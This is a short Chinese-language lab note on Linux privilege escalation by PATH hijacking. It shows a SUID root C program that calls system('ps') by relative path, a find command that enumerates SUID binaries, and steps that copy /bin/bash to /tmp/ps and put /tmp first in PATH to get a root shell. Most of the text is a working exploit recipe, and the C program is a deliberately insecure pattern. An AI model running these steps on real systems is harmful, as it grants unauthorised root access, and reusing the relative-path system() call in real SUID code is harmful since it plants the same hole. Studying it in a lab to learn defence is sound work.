攻击原理:管理员编译了程序,给予了程序管理员的方案,攻击者通过对程序的运行、调试、反编译等得到了程序的运行大概逻辑,尝试对程序调用的环境变量进行复制后覆盖,导致程序加载继承权限。
实验环境:c语言脚本,会执行PS命令,系统自带的变量ps路径为/bin/ps
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
void main()
{
setuid(0);
setgid(0);
system("ps");
}
1.探针:find / -user root -perm -4000 -print 2>/dev/null
2.root用户将可执行文件进行编译,保证文件的正常授权运行,给予ROOT权限执行
gcc demo.c -o shell
chmod u+s shell
- 普通用户通过对文件反编译或源代码查看,覆盖其执行环境变量,直接让其执行指定程序获取权限
#将bash命令复制到tmp目录下,覆盖c语言脚本生成的ps命令,当我们执行shell的时候,默认执行ps命令的root权限
cp /bin/bash /tmp/ps
4.利用原理:没有环境变量就找当前对应程序名,有环境变量就找环境调用
#添加环境变量
export PATH=/tmp:$PATH
#查看是否添加成功
find / -user root -perm -4000 -print 2>/dev/null
./shell
id